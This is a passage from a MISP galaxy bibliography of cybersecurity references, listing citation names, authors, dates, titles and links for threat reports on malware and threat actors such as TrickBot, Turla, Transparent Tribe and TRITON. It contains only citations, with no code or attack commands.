Table 15813. Table References

Links

https://blog.bushidotoken.net/2023/08/tracking-adversaries-scattered-spider.html

Lateral Movement Payne

Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.

The tag is: misp-galaxy:references="Lateral Movement Payne"

Table 15814. Table References

Links

https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts

Unit 42 KerrDown February 2019

Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus’ new Downloader, KerrDown. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Unit 42 KerrDown February 2019"

Table 15815. Table References

Links

https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/

Trend Micro TeamTNT

Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Trend Micro TeamTNT"

Table 15816. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf

SANS Windshift August 2018

Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="SANS Windshift August 2018"

Table 15817. Table References

Links

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf

Microsoft TxF

Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft TxF"

Table 15818. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx

Rclone-mega-extortion_05_2021

Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Rclone-mega-extortion_05_2021"

Table 15819. Table References

Links

https://redcanary.com/blog/rclone-mega-extortion/

JScrip May 2018

Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="JScrip May 2018"

Table 15820. Table References

Links

https://docs.microsoft.com/windows/win32/com/translating-to-jscript

tt_obliqueRAT

Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="tt_obliqueRAT"

Table 15821. Table References

Links

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

Talos Transparent Tribe May 2021

Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Talos Transparent Tribe May 2021"

Table 15822. Table References

Links

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

Cisco Talos Transparent Tribe Education Campaign July 2022

N. Baisini. (2022, July 13). Transparent Tribe begins targeting education sector in latest campaign. Retrieved September 22, 2022.

The tag is: misp-galaxy:references="Cisco Talos Transparent Tribe Education Campaign July 2022"

Table 15823. Table References

Links

https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html

tt_httrack_fake_domains

Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials. Retrieved September 6, 2022.

The tag is: misp-galaxy:references="tt_httrack_fake_domains"

Table 15824. Table References

Links

https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html

Securelist Trasparent Tribe 2020

Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Securelist Trasparent Tribe 2020"

Table 15825. Table References

Links

https://securelist.com/transparent-tribe-part-1/98127/

Kaspersky Transparent Tribe August 2020

Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Kaspersky Transparent Tribe August 2020"

Table 15826. Table References

Links

https://securelist.com/transparent-tribe-part-1/98127/

Microsoft TransportAgent Jun 2016

Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.

The tag is: misp-galaxy:references="Microsoft TransportAgent Jun 2016"

Table 15827. Table References

Links

https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help

Trap Manual

ss64. (n.d.). trap. Retrieved May 21, 2019.

The tag is: misp-galaxy:references="Trap Manual"

Table 15828. Table References

Links

https://ss64.com/bash/trap.html

Red Canary Netwire Linux 2022

Tony Lambert. (2022, June 7). Trapping the Netwire RAT on Linux. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="Red Canary Netwire Linux 2022"

Table 15829. Table References

Links

https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/

Cyberciti Trap Statements

Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.

The tag is: misp-galaxy:references="Cyberciti Trap Statements"

Table 15830. Table References

Links

https://bash.cyberciti.biz/guide/Trap_statement

Dept. of Treasury Iran Sanctions September 2020

Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.

The tag is: misp-galaxy:references="Dept. of Treasury Iran Sanctions September 2020"

Table 15831. Table References

Links

https://home.treasury.gov/news/press-releases/sm1127

Treasury EvilCorp Dec 2019

U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="Treasury EvilCorp Dec 2019"

Table 15832. Table References

Links

https://home.treasury.gov/news/press-releases/sm845

Treasury North Korean Cyber Groups September 2019

US Treasury. (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Treasury North Korean Cyber Groups September 2019"

Table 15833. Table References

Links

https://home.treasury.gov/news/press-releases/sm774

Mandiant APT29 Trello

Wolfram, J. et al. (2022, April 28). Trello From the Other Side: Tracking APT29 Phishing Campaigns. Retrieved August 3, 2022.

The tag is: misp-galaxy:references="Mandiant APT29 Trello"

Table 15834. Table References

Links

https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns

Malicious Chrome Extension Numbers

Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Malicious Chrome Extension Numbers"

Table 15835. Table References

Links

https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf

Triage 23893f035f8564dfea5030b9fdd54120d96072bb

tria.ge. (n.d.). Triage 23893f035f8564dfea5030b9fdd54120d96072bb. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Triage 23893f035f8564dfea5030b9fdd54120d96072bb"

Table 15836. Table References

Links

https://tria.ge/230726-q34mlacc72

Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7

tria.ge. (n.d.). Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7"

Table 15837. Table References

Links

https://tria.ge/231004-q6y7aaeb22

exatrack bpf filters passive backdoors

ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.

The tag is: misp-galaxy:references="exatrack bpf filters passive backdoors"

Table 15838. Table References

Links

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

Malwarebytes TrickBot Sep 2019

Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Malwarebytes TrickBot Sep 2019"

Table 15839. Table References

Links

https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/

TrendMicro Trickbot Feb 2019

Llimos, N., Pascual, C. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.

The tag is: misp-galaxy:references="TrendMicro Trickbot Feb 2019"

Table 15840. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/

Eclypsium Trickboot December 2020

Eclypsium, Advanced Intelligence. (2020, December 1). TRICKBOT NOW OFFERS ‘TRICKBOOT’: PERSIST, BRICK, PROFIT. Retrieved March 15, 2021.

The tag is: misp-galaxy:references="Eclypsium Trickboot December 2020"

Table 15841. Table References

Links

https://eclypsium.com/wp-content/uploads/2020/12/TrickBot-Now-Offers-TrickBoot-Persist-Brick-Profit.pdf

IBM X-Force ITG23 Oct 2021

Villadsen, O., et al. (2021, October 13). Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="IBM X-Force ITG23 Oct 2021"

Table 15842. Table References

Links

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

Trend Micro Trickbot Nov 2018

Anthony, N., Pascual, C. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.

The tag is: misp-galaxy:references="Trend Micro Trickbot Nov 2018"

Table 15843. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/

Joe Sec Trickbot

Joe Security. (2020, July 13). TrickBot’s new API-Hammering explained. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Joe Sec Trickbot"

Table 15844. Table References

Links

https://www.joesecurity.org/blog/498839998833561473

Fortinet TrickBot

Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot’s New Reconnaissance Plugin. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Fortinet TrickBot"

Table 15845. Table References

Links

https://www.fortinet.com/blog/threat-research/trickbot-s-new-reconnaissance-plugin.html

Trickbot VNC module July 2021

Ionut Illascu. (2021, July 14). Trickbot updates its VNC module for high-value targets. Retrieved September 10, 2021.

The tag is: misp-galaxy:references="Trickbot VNC module July 2021"

Table 15846. Table References

Links

https://www.bleepingcomputer.com/news/security/trickbot-updates-its-vnc-module-for-high-value-targets/

Fidelis TrickBot Oct 2016

Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="Fidelis TrickBot Oct 2016"

Table 15847. Table References

Links

https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre

Bromium Ursnif Mar 2017

Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019.

The tag is: misp-galaxy:references="Bromium Ursnif Mar 2017"

Table 15848. Table References

Links

https://www.bromium.com/how-ursnif-evades-detection/

IBM TrickBot Nov 2016

Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="IBM TrickBot Nov 2016"

Table 15849. Table References

Links

https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/

TrendMictro Phishing

Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="TrendMictro Phishing"

Table 15850. Table References

Links

https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html

Trimarc Detecting Password Spraying

Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="Trimarc Detecting Password Spraying"

Table 15851. Table References

Links

https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing

Dragos TRISIS

Dragos. (2017, December 13). TRISIS Malware Analysis of Safety System Targeted Malware. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Dragos TRISIS"

Table 15852. Table References

Links

https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf

FireEye TRITON 2019

Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="FireEye TRITON 2019"

Table 15853. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html

FireEye TEMP.Veles JSON April 2019

Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.

The tag is: misp-galaxy:references="FireEye TEMP.Veles JSON April 2019"

Table 15854. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html

FireEye TEMP.Veles 2018

FireEye Intelligence. (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="FireEye TEMP.Veles 2018"

Table 15855. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

Palo Alto MoonWind March 2017

Miller-Osborn, J. and Grunzweig, J. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.

The tag is: misp-galaxy:references="Palo Alto MoonWind March 2017"

Table 15856. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

CyberESI GTALK

CyberESI. (2011). TROJAN.GTALK. Retrieved June 29, 2015.

The tag is: misp-galaxy:references="CyberESI GTALK"

Table 15857. Table References

Links

http://www.cyberengineeringservices.com/2011/12/15/trojan-gtalk/

Symantec Hydraq Jan 2010

Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.

The tag is: misp-galaxy:references="Symantec Hydraq Jan 2010"

Table 15858. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2010-011114-1830-99

Symantec Security Center Trojan.Kwampirs

Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.

The tag is: misp-galaxy:references="Symantec Security Center Trojan.Kwampirs"

Table 15859. Table References

Links

https://www.symantec.com/security-center/writeup/2016-081923-2700-99

Symantec Naid June 2012

Neville, A. (2012, June 15). Trojan.Naid. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Naid June 2012"

Table 15860. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99

Symantec Pasam May 2012

Mullaney, C. & Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Pasam May 2012"

Table 15861. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99

Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017

Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017"

Table 15862. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918

Symantec Ushedix June 2008

Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Symantec Ushedix June 2008"

Table 15863. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

Symantec Volgmer Aug 2014

Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Symantec Volgmer Aug 2014"

Table 15864. Table References

Links

https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2

FSecure Lokibot November 2019

Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020.

The tag is: misp-galaxy:references="FSecure Lokibot November 2019"

Table 15865. Table References

Links

https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml

Microsoft Totbrick Oct 2017

Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.

The tag is: misp-galaxy:references="Microsoft Totbrick Oct 2017"

Table 15866. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick

Ciubotariu 2014

Ciubotariu, M. (2014, January 23). Trojan.Zeroaccess.C Hidden in NTFS EA. Retrieved December 2, 2014.

The tag is: misp-galaxy:references="Ciubotariu 2014"

Table 15867. Table References

Links

http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea

TrendMicro TROJ-FAKEAV OCT 2012

Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.

The tag is: misp-galaxy:references="TrendMicro TROJ-FAKEAV OCT 2012"

Table 15868. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

troj_zegost

Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="troj_zegost"

Table 15869. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost

TrendMicro Tropic Trooper May 2020

Chen, J. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.

The tag is: misp-galaxy:references="TrendMicro Tropic Trooper May 2020"

Table 15870. Table References

Links

https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

TrendMicro Tropic Trooper Mar 2018

Horejsi, J., et al. (2018, March 14). Tropic Trooper’s New Strategy. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="TrendMicro Tropic Trooper Mar 2018"

Table 15871. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/

Unit 42 Tropic Trooper Nov 2016

Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="Unit 42 Tropic Trooper Nov 2016"

Table 15872. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

paloalto Tropic Trooper 2016

Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="paloalto Tropic Trooper 2016"

Table 15873. Table References

Links

https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

GitHub truffleHog

Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="GitHub truffleHog"

Table 15874. Table References

Links

https://github.com/dxa4481/truffleHog

TCG Trusted Platform Module

Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="TCG Trusted Platform Module"

Table 15875. Table References

Links

http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf

Microsoft Trusts

Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Microsoft Trusts"

Table 15876. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)

SSHjack Blackhat

Adam Boileau. (2005, August 5). Trust Transience: Post Intrusion SSH Hijacking. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="SSHjack Blackhat"

Table 15877. Table References

Links

https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf

Trend Micro Totbrick Oct 2016

Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.

The tag is: misp-galaxy:references="Trend Micro Totbrick Oct 2016"

Table 15878. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n

Ttdinject.exe - LOLBAS Project

LOLBAS. (2020, May 12). Ttdinject.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ttdinject.exe - LOLBAS Project"

Table 15879. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/

ttint_rat

Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.

The tag is: misp-galaxy:references="ttint_rat"

Table 15880. Table References

Links

https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/

Tttracer.exe - LOLBAS Project

LOLBAS. (2019, November 5). Tttracer.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Tttracer.exe - LOLBAS Project"

Table 15881. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Tttracer/

Invincea XTunnel

Belcher, P. (2016, July 28). Tunnel of Gov: DNC Hack and the Russian XTunnel. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Invincea XTunnel"

Table 15882. Table References

Links

https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/

ThreatGeek Derusbi Converge

Fidelis Threat Research Team. (2016, May 2). Turbo Twist: Two 64-bit Derusbi Strains Converge. Retrieved August 16, 2018.

The tag is: misp-galaxy:references="ThreatGeek Derusbi Converge"

Table 15883. Table References

Links

https://www.fidelissecurity.com/threatgeek/threat-intelligence/turbo-twist-two-64-bit-derusbi-strains-converge

Mandiant Suspected Turla Campaign February 2023

Hawley, S. et al. (2023, February 2). Turla: A Galaxy of Opportunity. Retrieved May 15, 2023.

The tag is: misp-galaxy:references="Mandiant Suspected Turla Campaign February 2023"

Table 15884. Table References

Links

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

ESET Crutch December 2020

Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.

The tag is: misp-galaxy:references="ESET Crutch December 2020"

Table 15885. Table References

Links

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

ESET LightNeuron May 2019

Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.

The tag is: misp-galaxy:references="ESET LightNeuron May 2019"

Table 15886. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

ESET Turla Mosquito May 2018

ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="ESET Turla Mosquito May 2018"

Table 15887. Table References

Links

https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/

ESET Turla August 2018

ESET. (2018, August). Turla Outlook Backdoor: Analysis of an unusual Turla backdoor. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="ESET Turla August 2018"

Table 15888. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf

Accenture HyperStack October 2020

Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.

The tag is: misp-galaxy:references="Accenture HyperStack October 2020"

Table 15889. Table References

Links

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

Gmail Delegation

Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Gmail Delegation"

Table 15890. Table References

Links

https://support.google.com/a/answer/7223765?hl=en

Google Cloud Privilege Escalation

Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud Privilege Escalation"

Table 15891. Table References

Links

https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/

SSH in Windows

Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="SSH in Windows"

Table 15892. Table References

Links

https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh

Microsoft NEODYMIUM Dec 2016

Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft NEODYMIUM Dec 2016"

Table 15893. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

Twitter Richard WMIC

Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Twitter Richard WMIC"

Table 15894. Table References

Links

https://twitter.com/rfackroyd/status/1639136000755765254

Twitter Nick Carr APT10

Carr, N. (2017, April 6). Retrieved June 29, 2017.

The tag is: misp-galaxy:references="Twitter Nick Carr APT10"

Table 15895. Table References

Links

https://twitter.com/ItsReallyNick/status/850105140589633536

Crowdstrike KRYPTONITE PANDA August 2018

Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="Crowdstrike KRYPTONITE PANDA August 2018"

Table 15896. Table References

Links

https://www.crowdstrike.com/blog/two-birds-one-stone-panda/

Two New Monero Malware Attacks Target Windows and Android Users

Douglas Bonderud. (2018, September 17). Two New Monero Malware Attacks Target Windows and Android Users. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="Two New Monero Malware Attacks Target Windows and Android Users"

Table 15897. Table References

Links

https://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-users/

Trend Micro Pawn Storm April 2017

Hacquebord, F. (2017, April 25). Two Years of Pawn Storm: Examining an Increasingly Relevant Threat. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Trend Micro Pawn Storm April 2017"

Table 15898. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf

Almond COR_PROFILER Apr 2019

Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Almond COR_PROFILER Apr 2019"

Table 15899. Table References

Links

https://offsec.almond.consulting/UAC-bypass-dotnet.html

Github UACMe

UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="Github UACMe"

Table 15900. Table References

Links

https://github.com/hfiref0x/UACME

ZScaler SEO

Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="ZScaler SEO"

Table 15901. Table References

Links

https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0

PaloAlto UBoatRAT Nov 2017

Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="PaloAlto UBoatRAT Nov 2017"

Table 15902. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

UK NSCS Russia SolarWinds April 2021

UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="UK NSCS Russia SolarWinds April 2021"

Table 15903. Table References

Links

https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise

UK Gov Malign RIS Activity April 2021

UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="UK Gov Malign RIS Activity April 2021"

Table 15904. Table References

Links

https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services

UK Gov UK Exposes Russia SolarWinds April 2021

UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="UK Gov UK Exposes Russia SolarWinds April 2021"

Table 15905. Table References

Links

https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise

UK NCSC Olympic Attacks October 2020

UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games. Retrieved November 30, 2020.

The tag is: misp-galaxy:references="UK NCSC Olympic Attacks October 2020"

Table 15906. Table References

Links

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

Cisco Ukraine Wipers January 2022

Biasini, N. et al. (2022, January 21). Ukraine Campaign Delivers Defacement and Wipers, in Continued Escalation. Retrieved March 14, 2022.

The tag is: misp-galaxy:references="Cisco Ukraine Wipers January 2022"

Table 15907. Table References

Links

https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html

Symantec Ukraine Wipers February 2022

Symantec Threat Hunter Team. (2022, February 24). Ukraine: Disk-wiping Attacks Precede Russian Invasion. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Symantec Ukraine Wipers February 2022"

Table 15908. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia

Bleepingcomputer Gamardeon FSB November 2021

Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.

The tag is: misp-galaxy:references="Bleepingcomputer Gamardeon FSB November 2021"

Table 15909. Table References

Links

https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/

Qualys Hermetic Wiper March 2022

Dani, M. (2022, March 1). Ukrainian Targets Hit by HermeticWiper, New Datawiper Malware. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Qualys Hermetic Wiper March 2022"

Table 15910. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware

GitHub Ultimate AppLocker Bypass List

Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.

